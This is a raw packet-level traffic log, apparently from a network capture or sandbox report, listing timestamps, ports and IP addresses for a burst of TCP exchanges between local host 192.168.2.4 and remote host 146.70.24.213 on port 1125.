Oct 11, 2024 16:53:48.879770994 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879772902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879789114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879798889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879829884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.965954065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.965984106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966002941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966017008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966027975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966039896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966053009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966056108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966056108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966063976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966078043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966090918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966101885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966114044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966118097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966118097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966129065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966141939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966156006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966165066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966165066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966166973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966207981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966207981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966315985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966331005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966348886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966360092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966371059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966377974 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966382980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966397047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966413975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966423035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966423035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966425896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966464043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966466904 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966475010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966489077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966500998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966511965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966522932 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.966528893 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966528893 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966583967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.966995955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967025042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967036963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967061996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967092037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967092037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967104912 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967117071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967128038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967144966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967166901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967166901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967202902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967215061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967226982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967238903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967251062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967269897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967269897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967323065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967334032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967345953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967355967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967367887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967380047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967400074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967412949 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967412949 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967417955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967431068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967437983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967443943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967458010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967473030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967499018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967499018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967545986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967557907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967570066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967581034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967592955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967605114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967611074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967611074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967626095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967653036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967664957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967677116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967689037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967700958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967720032 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967720032 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967783928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967796087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967808962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967820883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967830896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967853069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967873096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.967957973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967969894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967979908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.967992067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968002081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968028069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968028069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968055010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968072891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968086004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968097925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968107939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968118906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968122959 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968123913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968132973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968143940 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968144894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968158960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968194962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968211889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968211889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968231916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968245029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968282938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968384027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968395948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968406916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968419075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968430996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968441963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968450069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968450069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968453884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968488932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968488932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.968514919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968549967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968561888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.968594074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970304012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970336914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970349073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970374107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970395088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970499039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970511913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970523119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970537901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970550060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970566988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970596075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970602989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970607996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970621109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970632076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970643997 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970644951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970659971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970680952 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970680952 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970707893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970717907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970729113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970741987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970747948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970755100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970761061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970767975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970781088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970793009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.970828056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.970828056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057457924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057504892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057518005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057531118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057543993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057557106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057570934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057584047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057595968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057607889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057620049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057631016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057642937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057642937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057642937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057666063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057678938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057692051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057698965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057698965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057706118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057718039 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057719946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057744980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057758093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057770967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057770967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057779074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057791948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057805061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057840109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057840109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057859898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057873011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057885885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057898045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057913065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.057924032 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.057924032 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058048964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058377981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058398962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058412075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058433056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058444977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058453083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058458090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058478117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058478117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058494091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058505058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058520079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058520079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058558941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058568954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058568954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058572054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058587074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058598995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058633089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058634996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058634996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058645964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058660030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058687925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058700085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058705091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058713913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058728933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058729887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058760881 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058773041 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058773041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058787107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058809042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058821917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058831930 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058832884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058836937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058870077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.058953047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058965921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058979034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.058999062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059012890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059016943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059016943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059026957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059041023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059051991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059065104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059077978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059077978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059081078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059123039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059134007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059145927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059154987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059154987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059159994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059174061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059207916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059216022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059216022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059221029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059236050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059248924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059262037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059287071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059287071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059346914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059360027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059374094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059396982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059410095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059412956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059412956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059423923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059438944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059454918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059469938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059474945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059474945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059518099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059644938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059659004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059672117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059684992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059696913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059710979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059721947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059721947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059722900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059737921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059751034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059763908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059776068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.059784889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059784889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.059803963 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061212063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061232090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061254025 CEST	1125	49730	146.70.24.213	192.168.2.4
